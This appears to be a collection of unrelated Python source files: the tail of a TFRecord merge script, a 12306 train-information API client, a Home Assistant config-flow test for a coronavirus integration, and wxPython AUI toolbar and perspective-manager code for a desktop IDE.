if not example.features.feature[k].WhichOneof('kind')=='bytes_list':
raise RuntimeError("key col {} type must be bytes_list, but got {}".format(k, example.features.feature[k].WhichOneof('kind')))
if not len(example.features.feature[k].bytes_list.value) == 1:
raise RuntimeError("key col {} length must be 1, but got {}".format(k, len(example.features.feature[k].bytes_list.value)))
example_right_str = t.get(example.features.feature[k].bytes_list.value[0])
if example_right_str is not None:
example_right = tf.train.Example()
example_right.ParseFromString(example_right_str)
example.MergeFrom(example_right)
writer.write(example.SerializeToString())
writer.close()
log.info("write to file {} end.".format(shard[1]))
| 3,993 | 1,187 |
#!/usr/bin/env python3
from datetime import date
from itertools import chain
from operator import itemgetter
from os.path import commonprefix
from tickets import API
from typing import Any, Iterable, Dict, List, Optional, Tuple
from util import repl, AttrDict
COMMENT_MAPPING = {
'A': "",
'B': "宿",
'C': "广",
'D': "办",
'E': "宿广",
'F': "",
'G': "",
'H': "联运",
'I': "回转",
'J': "",
'K': "广办",
'L': "欠",
'M': "",
'N': "残",
'O': "残广",
'P': "残办",
'Q': "静",
}
class Wifi12306(API):
'https://wifi.12306.cn/wifiapps/ticket/api/'
def __init__(self):
super().__init__()
self.headers.update({
'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.20(0x18001428) NetType/4G Language/zh_CN',
})
def request(self, *args, json=True, **kwargs):
resp = super().request(*args, json=json, **kwargs)
if not json:
return resp
if resp.get('status', -1):
raise APIError(resp.get('error'))
return resp.get('data')
@staticmethod
def yyyymmdd_format(date: date) -> str:
return date.isoformat().replace('-', '')
@staticmethod
def from_yyyymmdd_format(s: str) -> date:
return date.fromisoformat('{0[:4]}-{0[4:6]}-{0[6:8]}'.format(s))
def train_list_by_station_name(
self,
from_station_name: str,
to_station_name: str,
query_date: Optional[date]=None,
) -> List[Dict[str, Any]]:
if not query_date:
query_date = date.today()
return self.get(
'stoptime/queryByStationName',
params=dict(
trainDate=query_date.isoformat(),
fromStationName=from_station_name,
toStationName=to_station_name))
def run_rule_by_train_no(
self,
train_no: str,
start_date: Optional[date]=None,
end_date: Optional[date]=None,
) -> Dict[date, bool]:
if not start_date:
start_date = date.today()
if not end_date:
end_date = date.fromordinal(start_date.toordinal() + 1)
resp = self.get(
'trainDetailInfo/queryTrainRunRuleByTrainNoAndDateRange',
params=dict(
start=self.yyyymmdd_format(start_date),
end=self.yyyymmdd_format(end_date),
trainNo=train_no))
return {
self.from_yyyymmdd_format(k): resp[k] == '1'
for k in sorted(resp)
}
def stop_time_by_train_code(
self,
train_code: str,
query_date: Optional[date]=None,
big_screen: Optional[bool]=False,
) -> List[Dict[str, Any]]:
if not query_date:
query_date = date.today()
return self.get(
'stoptime/queryByTrainCode',
params=dict(
getBigScreen=['NO', 'YES'][big_screen],
trainDate=self.yyyymmdd_format(query_date),
trainCode=train_code))
def pre_seq_train_by_train_code(
self,
train_code: str,
query_date: Optional[date]=None,
) -> List[Dict[str, Any]]:
if not query_date:
query_date = date.today()
return self.get(
'preSequenceTrain/getPreSequenceTrainInfo',
params=dict(
trainDate=self.yyyymmdd_format(query_date),
trainCode=train_code))
def train_set_type_by_train_code(self, train_code: str) -> Dict[str, Any]:
return self.get(
'trainDetailInfo/getTrainsetTypeByTrainCode',
params=dict(trainCode=train_code))
def train_compile_list_by_train_no(self, train_no: str) -> List[Dict]:
return self.get(
'trainDetailInfo/queryTrainCompileListByTrainNo',
params=dict(trainNo=train_no))
def train_equipment_by_train_no(self, train_no: str) -> List[Dict]:
return self.get(
'trainDetailInfo/queryTrainEquipmentByTrainNo',
params=dict(trainNo=train_no))
@staticmethod
def denormalize_multiple_train_code(train_codes: Iterable[str]) -> str:
train_numbers = []
for i, t in enumerate(train_codes):
if i == 0:
prefix = t
last_train_number = t
train_numbers.append(t)
elif t != last_train_number:
prefix = commonprefix([prefix, t])
last_train_number = t
train_numbers.append(t)
return prefix + '/'.join(t[len(prefix):] for t in train_numbers)
def info_by_train_code(self, train_code: str) -> Optional[Dict[str, Any]]:
stations = self.stop_time_by_train_code(train_code)
if not stations:
return
start_station, *_, end_station = stations
train_code = self.denormalize_multiple_train_code(
s['stationTrainCode'] for s in stations)
train_no = start_station['trainNo']
distance = end_station['distance']
time_span = self.explain_time_span(end_station['timeSpan'])
return AttrDict(locals())
@staticmethod
def explain_time_span(milliseconds: int) -> Tuple[int, int]:
return divmod(milliseconds // 1000 // 60, 60)
@classmethod
def explain_stop_time(cls, stations: List[Dict[str, Any]]) -> str:
for s in stations:
s['hours'], s['minutes'] = cls.explain_time_span(s['timeSpan'])
return '\n'.join(chain(
['\n'],
['车次 里程 用时 编号 到站 发车 电报码 站名', '-' * 21],
(
'{stationTrainCode:5} {distance:4} {hours:02}:{minutes:02}'
' {stationNo} {arriveTime} {startTime} '
'-{stationTelecode} {stationName}'.format_map(s)
for s in stations),
))
@staticmethod
def explain_pre_seq_train(pre_seq_train: List[Dict[str, Any]]) -> str:
return '\n'.join(chain(
['\n'],
['车次 里程 发时 到时 发站 到站', '-' * 18],
(
'{trainCode:5} {distance:>4} '
'{startTime} {endTime} {startStation} {endStation}'.format_map(s)
for s in pre_seq_train),
))
@staticmethod
def explain_train_equipment(train_equipment: List[Dict[str, Any]]) -> str:
depot = '{bureaName}局({deploydepotName}){depotName} '.format_map(
train_equipment[0])
vehicles = ' '.join(e['trainsetName'] for e in train_equipment)
if len(train_equipment) > 1:
vehicles += ' 重联'
return depot + vehicles
@staticmethod
def explain_train_compile_list(train_compile_list: List[Dict]) -> str:
for c in train_compile_list:
comment = c.get('commentCode')
c['comment'] = ' ' + comment + ' ' + COMMENT_MAPPING.get(comment, '')
return '\n'.join(chain(
['\n'],
['编号 车种 定员 附注', '-' * 10],
('{coachNo:4} {coachType:4.4} {limit1:3} {comment}'.
format_map(c) for c in sorted(
train_compile_list, key=itemgetter('coachNo'))),
))
def repl_handler(self, train_code: str) -> str:
try:
info = self.info_by_train_code(train_code)
except APIError as e:
print(e)
return '> '
print(
'{train_code}({start_station[stationName]}-'
'{end_station[stationName]},{distance} km,'
'{time_span[0]:02}:{time_span[1]:02})'.format_map(info))
train_equipment = self.train_equipment_by_train_no(info.train_no)
if train_equipment:
print(self.explain_train_equipment(train_equipment))
else:
train_set_type = self.train_set_type_by_train_code(info.train_no)
if train_set_type:
print('{trainsetType}{trainsetTypeName}'.format_map(
train_set_type))
train_compile_list = self.train_compile_list_by_train_no(info.train_no)
if train_compile_list:
print(self.explain_train_compile_list(train_compile_list))
print(self.explain_stop_time(info.stations))
pre_seq_train = self.pre_seq_train_by_train_code(train_code)
if pre_seq_train:
print(self.explain_pre_seq_train(pre_seq_train))
return '> '
class APIError(ValueError):
pass
if __name__ == '__main__':
repl(Wifi12306().repl_handler)
| 8,528 | 2,886 |
"""Test the Coronavirus config flow."""
from unittest.mock import MagicMock, patch
from aiohttp import ClientError
from homeassistant import config_entries, setup
from homeassistant.components.coronavirus.const import DOMAIN, OPTION_WORLDWIDE
from homeassistant.core import HomeAssistant
async def test_form(hass: HomeAssistant) -> None:
"""Test we get the form."""
await setup.async_setup_component(hass, "persistent_notification", {})
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"country": OPTION_WORLDWIDE},
)
assert result2["type"] == "create_entry"
assert result2["title"] == "Worldwide"
assert result2["result"].unique_id == OPTION_WORLDWIDE
assert result2["data"] == {
"country": OPTION_WORLDWIDE,
}
await hass.async_block_till_done()
assert len(hass.states.async_all()) == 4
@patch(
"coronavirus.get_cases",
side_effect=ClientError,
)
async def test_abort_on_connection_error(
mock_get_cases: MagicMock, hass: HomeAssistant
) -> None:
"""Test we abort on connection error."""
await setup.async_setup_component(hass, "persistent_notification", {})
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert "type" in result
assert result["type"] == "abort"
assert "reason" in result
assert result["reason"] == "cannot_connect"
| 1,648 | 525 |
import logging.config
import wx
from src.sqlite_executer.ConnectExecuteSqlite import SQLExecuter
from src.view.AutoCompleteTextCtrl import TextCtrlAutoComplete
# from src.view.TreePanel import CreatingTreePanel
from src.view.constants import *
from wx.lib.agw.aui.aui_constants import actionDragFloatingPane, AUI_DOCK_NONE, \
ITEM_NORMAL, ITEM_CHECK, ITEM_RADIO, ID_RESTORE_FRAME, \
AUI_BUTTON_STATE_NORMAL, AUI_BUTTON_STATE_PRESSED
from src.view.views.file.explorer.FileBrowserPanel import FileBrowser
from src.view.views.console.SqlOutputPanel import SqlConsoleOutputPanel
from src.view.views.console.worksheet.WorksheetPanel import CreateWorksheetTabPanel, \
CreatingWorksheetWithToolbarPanel
from src.view.views.sql.history.HistoryListPanel import HistoryGrid
from src.view.views.console.worksheet.WelcomePage import WelcomePanel
from wx.lib.agw.aui.framemanager import NonePaneInfo, wxEVT_AUI_PANE_MIN_RESTORE, \
AuiManagerEvent
from src.view.util.FileOperationsUtil import FileOperations
from wx.lib.platebtn import PlateButton, PB_STYLE_DEFAULT, PB_STYLE_DROPARROW
# from wx.lib.pubsub import setupkwargs
# regular pubsub import
from pubsub import pub
from wx.lib.agw.aui.auibar import AuiToolBarEvent, \
wxEVT_COMMAND_AUITOOLBAR_BEGIN_DRAG, wxEVT_COMMAND_AUITOOLBAR_MIDDLE_CLICK, \
wxEVT_COMMAND_AUITOOLBAR_RIGHT_CLICK
from src.view.views.python.explorer.PythonExplorer import PythonExplorerPanel
from wx import py
from src.view.views.java.explorer.JavaExplorer import CreatingJavaExplorerPanel
from src.view.views.project.explorer.ProjectExplorer import CreatingProjectExplorerPanel
from src.view.views.database.explorer.DataSourceExplorer import DataSourcePanel
from wx.lib.agw.aui import auibook
from src.view.other.new.NewFlow import NewFlowFrame
logging.config.dictConfig(LOG_SETTINGS)
logger = logging.getLogger('extensive')
try:
from agw import aui
from agw.aui import aui_switcherdialog as ASD
except ImportError: # if it's not there locally, try the wxPython lib.
import wx.lib.agw.aui as aui
from wx.lib.agw.aui import aui_switcherdialog as ASD
############################################################
class EclipseAuiToolbar(aui.AuiToolBar):
def __init__(self, parent):
super().__init__(parent, -1, agwStyle=aui.AUI_TB_DEFAULT_STYLE | wx.NO_BORDER)
pub.subscribe(self.__onObjectAdded, 'perspectiveClicked')
pub.subscribe(self.__onUpdatePageText, 'onUpdatePageText')
def __onObjectAdded(self, data, extra1, extra2=None):
# no longer need to access data through message.data.
print('Object', repr(data), 'is added')
print(extra1)
if extra2:
print(extra2)
def __onUpdatePageText(self, filePath, extra1, extra2=None):
# no longer need to access data through message.data.
logger.info(f'EclipseAuiToolbar.onUpdatePageText {filePath}')
print(extra1)
if extra2:
print(extra2)
def getToolBarItemById(self, id=None):
item = None
for _item in self._items:
if _item.id == id:
item = _item
break
return item
def OnLeaveWindow(self, event):
"""
Handles the ``wx.EVT_LEAVE_WINDOW`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
self.RefreshOverflowState()
# self.SetHoverItem(None)
# self.SetPressedItem(None)
#
# self._tip_item = None
self.StopPreviewTimer()
def SetPressedItem(self, pitem):
"""
Sets a toolbar item to be currently in a "pressed" state.
:param `pitem`: an instance of :class:`AuiToolBarItem`.
"""
if pitem and pitem.label != 'Open Perspective':
former_item = None
for item in self._items:
if item.state & aui.AUI_BUTTON_STATE_PRESSED:
former_item = item
item.state &= ~aui.AUI_BUTTON_STATE_PRESSED
pitem.state &= ~aui.AUI_BUTTON_STATE_HOVER
pitem.state |= aui.AUI_BUTTON_STATE_PRESSED
if former_item != pitem:
self.Refresh(False)
self.Update()
def OnLeftUp(self, event):
"""
Handles the ``wx.EVT_LEFT_UP`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
self.SetPressedItem(None)
hit_item = self.FindToolForPosition(*event.GetPosition())
if hit_item and not hit_item.state & aui.AUI_BUTTON_STATE_DISABLED:
self.SetHoverItem(hit_item)
if self._dragging:
# reset drag and drop member variables
self._dragging = False
self._action_pos = wx.Point(-1, -1)
self._action_item = None
else:
if self._action_item and hit_item == self._action_item:
self.SetToolTip("")
if hit_item.kind in [ITEM_CHECK, ITEM_RADIO]:
toggle = not (self._action_item.state & aui.AUI_BUTTON_STATE_CHECKED)
self.ToggleTool(self._action_item.id, toggle)
# repaint immediately
self.Refresh(False)
self.Update()
e = wx.CommandEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self._action_item.id)
e.SetEventObject(self)
e.SetInt(toggle)
self._action_pos = wx.Point(-1, -1)
self._action_item = None
self.ProcessEvent(e)
self.DoIdleUpdate()
else:
if self._action_item.id == ID_RESTORE_FRAME:
# find aui manager
manager = self.GetAuiManager()
if not manager:
return
if self._action_item.target:
pane = manager.GetPane(self._action_item.target)
else:
pane = manager.GetPane(self)
# from . import framemanager
e = AuiManagerEvent(wxEVT_AUI_PANE_MIN_RESTORE)
e.SetManager(manager)
e.SetPane(pane)
manager.ProcessEvent(e)
self.DoIdleUpdate()
else:
e = wx.CommandEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self._action_item.id)
e.SetEventObject(self)
self.ProcessEvent(e)
self.DoIdleUpdate()
# reset drag and drop member variables
self._dragging = False
self._action_pos = wx.Point(-1, -1)
self._action_item = None
def OnRightDown(self, event):
"""
Handles the ``wx.EVT_RIGHT_DOWN`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
cli_rect = wx.Rect(wx.Point(0, 0), self.GetClientSize())
if self._gripper_sizer_item:
gripper_rect = self._gripper_sizer_item.GetRect()
if gripper_rect.Contains(event.GetPosition()):
return
if self.GetOverflowVisible():
dropdown_size = self._art.GetElementSize(aui.AUI_TBART_OVERFLOW_SIZE)
if dropdown_size > 0 and event.GetX() > cli_rect.width - dropdown_size and \
event.GetY() >= 0 and event.GetY() < cli_rect.height and self._art:
return
self._action_pos = wx.Point(*event.GetPosition())
self._action_item = self.FindToolForPosition(*event.GetPosition())
if self._action_item:
if self._action_item.state & aui.AUI_BUTTON_STATE_DISABLED:
self._action_pos = wx.Point(-1, -1)
self._action_item = None
return
def OnRightUp(self, event):
"""
Handles the ``wx.EVT_RIGHT_UP`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
hit_item = self.FindToolForPosition(*event.GetPosition())
if self._action_item and hit_item == self._action_item:
e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_RIGHT_CLICK, self._action_item.id)
e.SetEventObject(self)
e.SetToolId(self._action_item.id)
e.SetClickPoint(self._action_pos)
self.ProcessEvent(e)
self.DoIdleUpdate()
else:
# right-clicked on the invalid area of the toolbar
e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_RIGHT_CLICK, -1)
e.SetEventObject(self)
e.SetToolId(-1)
e.SetClickPoint(self._action_pos)
self.ProcessEvent(e)
self.DoIdleUpdate()
# reset member variables
self._action_pos = wx.Point(-1, -1)
self._action_item = None
def OnMiddleDown(self, event):
"""
Handles the ``wx.EVT_MIDDLE_DOWN`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
cli_rect = wx.Rect(wx.Point(0, 0), self.GetClientSize())
if self._gripper_sizer_item:
gripper_rect = self._gripper_sizer_item.GetRect()
if gripper_rect.Contains(event.GetPosition()):
return
if self.GetOverflowVisible():
dropdown_size = self._art.GetElementSize(aui.AUI_TBART_OVERFLOW_SIZE)
if dropdown_size > 0 and event.GetX() > cli_rect.width - dropdown_size and \
event.GetY() >= 0 and event.GetY() < cli_rect.height and self._art:
return
self._action_pos = wx.Point(*event.GetPosition())
self._action_item = self.FindToolForPosition(*event.GetPosition())
if self._action_item:
if self._action_item.state & aui.AUI_BUTTON_STATE_DISABLED:
self._action_pos = wx.Point(-1, -1)
self._action_item = None
return
def OnMiddleUp(self, event):
"""
Handles the ``wx.EVT_MIDDLE_UP`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
hit_item = self.FindToolForPosition(*event.GetPosition())
if self._action_item and hit_item == self._action_item:
if hit_item.kind == ITEM_NORMAL:
e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_MIDDLE_CLICK, self._action_item.id)
e.SetEventObject(self)
e.SetToolId(self._action_item.id)
e.SetClickPoint(self._action_pos)
self.ProcessEvent(e)
self.DoIdleUpdate()
# reset member variables
self._action_pos = wx.Point(-1, -1)
self._action_item = None
def OnMotion(self, event):
"""
Handles the ``wx.EVT_MOTION`` event for :class:`AuiToolBar`.
:param `event`: a :class:`MouseEvent` event to be processed.
"""
# start a drag event
if not self._dragging and self._action_item != None and self._action_pos != wx.Point(-1, -1) and \
abs(event.GetX() - self._action_pos.x) + abs(event.GetY() - self._action_pos.y) > 5:
self.SetToolTip("")
self._dragging = True
e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_BEGIN_DRAG, self.GetId())
e.SetEventObject(self)
e.SetToolId(self._action_item.id)
self.ProcessEvent(e)
self.DoIdleUpdate()
return
hit_item = self.FindToolForPosition(*event.GetPosition())
if hit_item:
if not hit_item.state & aui.AUI_BUTTON_STATE_DISABLED:
self.SetHoverItem(hit_item)
else:
self.SetHoverItem(None)
else:
# no hit item, remove any hit item
self.SetHoverItem(hit_item)
# figure out tooltips
packing_hit_item = self.FindToolForPositionWithPacking(*event.GetPosition())
if packing_hit_item:
if packing_hit_item != self._tip_item:
self._tip_item = packing_hit_item
if packing_hit_item.short_help != "":
self.StartPreviewTimer()
self.SetToolTip(packing_hit_item.short_help)
else:
self.SetToolTip("")
self.StopPreviewTimer()
else:
self.SetToolTip("")
self._tip_item = None
self.StopPreviewTimer()
# if we've pressed down an item and we're hovering
# over it, make sure it's state is set to pressed
if self._action_item:
if self._action_item == hit_item:
self.SetPressedItem(self._action_item)
else:
self.SetPressedItem(None)
# figure out the dropdown button state (are we hovering or pressing it?)
self.RefreshOverflowState()
self.Realize()
class MyAuiManager(aui.AuiManager):
def __init__(self, managed_window=None, agwFlags=None):
super(MyAuiManager, self).__init__(managed_window=managed_window, agwFlags=agwFlags)
def addTabByWindow(self, window=None , icon=None, imageName="script.png", name=None, captionName=None, tabDirection=5):
'''
This method always create a new tab for the window.
tabDirection=2 is the right
tabDirection=3 is the bottom
tabDirection=4 is the left
tabDirection=5 is the center
'''
self.SetAutoNotebookStyle(aui.AUI_NB_DEFAULT_STYLE | wx.BORDER_NONE)
if name == None:
name = captionName
isPaneAdded = False
for pane in self.GetAllPanes():
# logger.debug(pane.dock_direction_get())
if pane.dock_direction_get() == tabDirection: # adding to center tab
if not icon:
icon = FileOperations().getImageBitmap(imageName=imageName)
auiPanInfo = aui.AuiPaneInfo().Icon(icon).\
Name(name).Caption(captionName).LeftDockable(True).Direction(wx.TOP).\
Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).MinSize(200, -1)\
.BestSize(200, -1).CaptionVisible(visible=True)
targetTab = pane
if not pane.HasNotebook():
self.CreateNotebookBase(self._panes, pane)
# targetTab.NotebookPage(pane.notebook_id)
self.AddPane(window, auiPanInfo, target=targetTab)
isPaneAdded = True
# self._mgr._notebooks
# self._mgr.ActivatePane(targetTab.window)
else:
self.AddPane(window, auiPanInfo, target=targetTab)
isPaneAdded = True
break
if not isPaneAdded:
auiPanInfo = aui.AuiPaneInfo().Icon(FileOperations().getImageBitmap(imageName=imageName)).\
Name(name).Caption(captionName).LeftDockable(True).Dockable(True).Movable(True).MinSize(200, -1).BestSize(200, -1).CaptionVisible(visible=True).Direction(wx.TOP).\
Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).CaptionVisible(visible=True)
auiPanInfo.dock_direction = tabDirection
self.AddPane(window, auiPanInfo)
self.Update()
def OnTabBeginDrag(self, event):
"""
Handles the ``EVT_AUINOTEBOOK_BEGIN_DRAG`` event.
:param `event`: a :class:`~wx.lib.agw.aui.auibook.AuiNotebookEvent` event to be processed.
"""
if self._masterManager:
self._masterManager.OnTabBeginDrag(event)
else:
paneInfo = self.PaneFromTabEvent(event)
if paneInfo.IsOk():
# It's one of ours!
self._action = actionDragFloatingPane
mouse = wx.GetMousePosition()
# set initial float position - may have to think about this
# offset a bit more later ...
self._action_offset = wx.Point(20, 10)
self._toolbar_action_offset = wx.Point(20, 10)
paneInfo.floating_pos = mouse - self._action_offset
paneInfo.dock_pos = AUI_DOCK_NONE
paneInfo.notebook_id = -1
tab = event.GetEventObject()
try:
if tab.HasCapture():
tab.ReleaseMouse()
except:
pass
# float the window
if paneInfo.IsMaximized():
self.RestorePane(paneInfo)
paneInfo.Float()
# The call to Update may result in
# the notebook that generated this
# event being deleted, so we have
# to do the call asynchronously.
wx.CallAfter(self.Update)
self._action_window = paneInfo.window
self._frame.CaptureMouse()
event.SetDispatched(True)
else:
# not our window
event.Skip()
def GetPaneByHavingName(self, name):
"""
This version of :meth:`GetPane` looks up a pane based on a 'pane name'.
:param string `name`: the pane name.
:see: :meth:`GetPane`
"""
for p in self._panes:
if p.name in name:
return p
return NonePaneInfo
def hidePane(self, window):
self.ShowPane(window, show=False)
def OnSize(self, event):
super().OnSize(event)
(x, y) = self._frame.GetClientSize()
perspectiveToolbar = self.GetPane("perspectiveToolbar")
perspectiveToolbar.dock_pos = x - ((len(perspectiveToolbar.window._items) - 2) * 32) + 5
self.Update()
# self.DoDropToolbar(self._docks, self._panes, perspectiveToolbar, point, wx.Point(0,0))
class PerspectiveManager(object):
"""Creates a perspective manager for the given aui managed window.
It supports saving and loading of on disk perspectives as created by
calling SavePerspective from the AuiManager. Mixin class for a wx.Frame.
"""
def __init__(self, base=None):
"""Initializes the perspective manager. The auimgr parameter is
a reference to the windows AuiManager instance, base is the base
path to where perspectives should be loaded from and saved to.
@param base: path to configuration cache
"""
super(PerspectiveManager, self).__init__()
self.toolbarItems = {}
self.createAuiManager()
pub.subscribe(self.__onObjectAdded, 'perspectiveClicked')
pub.subscribe(self.__onUpdatePageText, 'onUpdatePageText')
self.accel_tbl = wx.AcceleratorTable([
(wx.ACCEL_CTRL, ord('N'), ID_NEW),
(wx.ACCEL_CTRL, ord('Y'), ID_REDO),
(wx.ACCEL_CTRL, ord('Z'), ID_UNDO),
(wx.ACCEL_CTRL, ord('C'), ID_COPY),
(wx.ACCEL_CTRL, ord('V'), ID_PASTE),
(wx.ACCEL_CTRL, ord('X'), ID_CUT),
(wx.ACCEL_CTRL | wx.ACCEL_ALT, wx.WXK_DOWN, ID_DUPLICATE_LINE),
(wx.ACCEL_CTRL, ord('S'), ID_SAVE),
(wx.ACCEL_CTRL, ord('H'), ID_SEARCH_FILE),
(wx.ACCEL_CTRL | wx.ACCEL_SHIFT, ord('F'), ID_FORMAT_FILE),
(wx.ACCEL_CTRL | wx.ACCEL_SHIFT , ord('R'), ID_RESOURCE),
(wx.ACCEL_CTRL | wx.ACCEL_SHIFT , ord('T'), ID_OPEN_TYPE),
# (wx.ACCEL_CTRL, ord('V'), wx.ID_PASTE),
# (wx.ACCEL_ALT, ord('X'), wx.ID_PASTE),
# (wx.ACCEL_SHIFT | wx.ACCEL_ALT, ord('Y'), wx.ID_PASTE)
])
self.SetAcceleratorTable(self.accel_tbl)
def __onUpdatePageText(self, filePath, extra1, extra2=None):
# no longer need to access data through message.data.
logger.info(f'PerspectiveManager.__onUpdatePageText: {filePath}')
viewToolbar = self._mgr.GetPane("viewToolbar")
print(extra1)
toolSave = viewToolbar.window.FindTool(ID_SAVE)
toolSaveAll = viewToolbar.window.FindTool(ID_SAVE_ALL)
toolSaveAll.state = aui.AUI_BUTTON_STATE_NORMAL
toolSave.state = aui.AUI_BUTTON_STATE_NORMAL
logger.info(toolSave.state)
self.updateTitle(title=filePath)
self._mgr.Update()
if extra2:
print(extra2)
def __onObjectAdded(self, data, extra1, extra2=None):
# no longer need to access data through message.data.
print('PerspectiveManager', repr(data), 'is added')
print(extra1)
if extra2:
print(extra2)
def createAuiManager(self):
logger.debug('createAuiManager')
# tell FrameManager to manage this frame
self._mgr = MyAuiManager()
self._mgr.SetManagedWindow(self)
# set up default notebook style
self._notebook_style = aui.AUI_NB_DEFAULT_STYLE | wx.BORDER_NONE
self._notebook_theme = 1
# min size for the frame itself isn't completely done.
# see the end up AuiManager.Update() for the test
# code. For now, just hard code a frame minimum size
self.SetMinSize(wx.Size(100, 100))
self._perspectives = []
# add a bunch of panes
# self._mgr.AddPane(self.CreateSizeReportCtrl(), wx.aui.AuiPaneInfo().Name("test1").Caption("Pane Caption").Top().CloseButton(True).MaximizeButton(True))
# add the toolbars to the manager
# topToolBar = wx.BoxSizer(wx.HORIZONTAL)
# topToolBar.Add(self.constructToolBar(),1,wx.ALIGN_LEFT,4) # note the 2nd param 'proportion' is 1
# #topToolBar.AddStretchSpacer()
# topToolBar.Add(self.constructToolBar(),0,wx.ALIGN_RIGHT,4)
self._mgr.AddPane(self.constructViewToolBar(), aui.AuiPaneInfo().
Name("viewToolbar").Caption("View Toolbar").
ToolbarPane().Top().Row(1).Position(1).CloseButton(True).
LeftDockable(False).RightDockable(False).Gripper(True))
self._mgr.AddPane(self.constructPerspectiveToolBar(), aui.AuiPaneInfo().
Name("perspectiveToolbar").Caption("Perspective Toolbar").
ToolbarPane().Top().Row(1).Position(1).CloseButton(True).
LeftDockable(False).RightDockable(False).Gripper(True), self.definePoint())
# self._mgr.AddPane(self.creatingFileExplorer(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="file_explorer.png")).BestSize(500, -1).
# Name("fileExplorer").Caption("File Explorer").Dockable(True).Movable(True).MinSize(500, -1).Resizable(True).
# Left().Layer(1).Position(2).CloseButton(True).MaximizeButton(True).MinimizeButton(True))
# self._mgr.AddPane(self.creatingTreeCtrl(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="folder_database.png")).BestSize(500, -1).
# Name("databaseNaviagor").Caption("Database Navigator").Dockable(True).Movable(True).MinSize(500, -1).
# Left().Layer(1).Position(1).CloseButton(True).MaximizeButton(True).MinimizeButton(True), target=self._mgr.GetPane("fileExplorer"))
self._mgr.AddPane(WelcomePanel(self), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="welcome16.png")).BestSize(500, -1).
Name("onWelcome").Caption("Welcome").Dockable(True).Movable(True).MinSize(500, -1).CaptionVisible(visible=True).Direction(wx.TOP).
Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True))
# self._mgr.AddPane(wx.Panel(self), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="variable_view.png")).BestSize(500, -1).
# Name("variableView").Caption("Variable").Dockable(True).Movable(True).MinSize(500, -1).CaptionVisible(visible=True).Direction(wx.TOP).
# Right().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True))
# self._mgr.AddPane(self.constructCenterPane(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="script.png")).
# Name("centerPane").Caption("Center Pane").LeftDockable(True).Direction(wx.TOP).
# Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).CaptionVisible(visible=True), target=self._mgr.GetPane("onWelcome"))
# self._mgr.AddPane(self.getWorksheet(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="script.png")).
# Name("Worksheet-0").Caption("Worksheet-0").LeftDockable(True).Direction(wx.TOP).
# Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).CaptionVisible(visible=True), target=self._mgr.GetPane("onWelcome"))
# self._mgr.AddPane(self.constructSchemaViewerPane(), aui.AuiPaneInfo().Icon(wx.Bitmap(os.path.join(path, "script.png"))).
# Name("schemaViewer").Caption("Schema Viewer").LeftDockable(True).
# Center().CloseButton(True).MaximizeButton(True).MinimizeButton(True))
# self._mgr.AddPane(self.constructSchemaViewerPane(), aui.AuiPaneInfo().
# Name("test9").Caption("Min Size 200x100").
# BestSize(wx.Size(200, 100)).MinSize(wx.Size(200, 100)).
# Bottom().Layer(1).CloseButton(True).MaximizeButton(True))
# self._mgr.AddPane(self.sqlConsoleOutputPane(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="console_view.png")).
# Name("consoleOutput").Caption("Console").Dockable(True).Movable(True).LeftDockable(True).BestSize(wx.Size(500, 400)).MinSize(wx.Size(500, 400)).
# Bottom().Layer(0).Row(1).CloseButton(True).MaximizeButton(visible=True).MinimizeButton(visible=True).PinButton(visible=True).GripperTop())
# self._mgr.AddPane(self.constructHistoryPane(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="sql.png")).
# Name("sqlLog").Caption("SQL Log").Dockable(True).BestSize(wx.Size(500, 400)).MinSize(wx.Size(500, 400)).
# Bottom().Layer(0).Row(1).CloseButton(True).MaximizeButton(visible=True).MinimizeButton(visible=True), target=self._mgr.GetPane("consoleOutput"))
self._mgr.GetPane("onWelcome").Show()
viewToolbar = self._mgr.GetPane("viewToolbar")
viewToolbar.Show()
self._mgr.GetPane("variableView").Show()
perspectiveToolbar = self._mgr.GetPane("perspectiveToolbar")
perspectiveToolbar.dock_row = viewToolbar.dock_row
perspectiveToolbar.Show()
self.perspective_default = self._mgr.SavePerspective()
perspective_all = self._mgr.SavePerspective()
self.setStyleToPanes()
all_panes = self._mgr.GetAllPanes()
# "commit" all changes made to FrameManager
self._mgr.Update()
# some more event
self.Bind(aui.EVT_AUI_PANE_CLOSE, self.OnPaneClose)
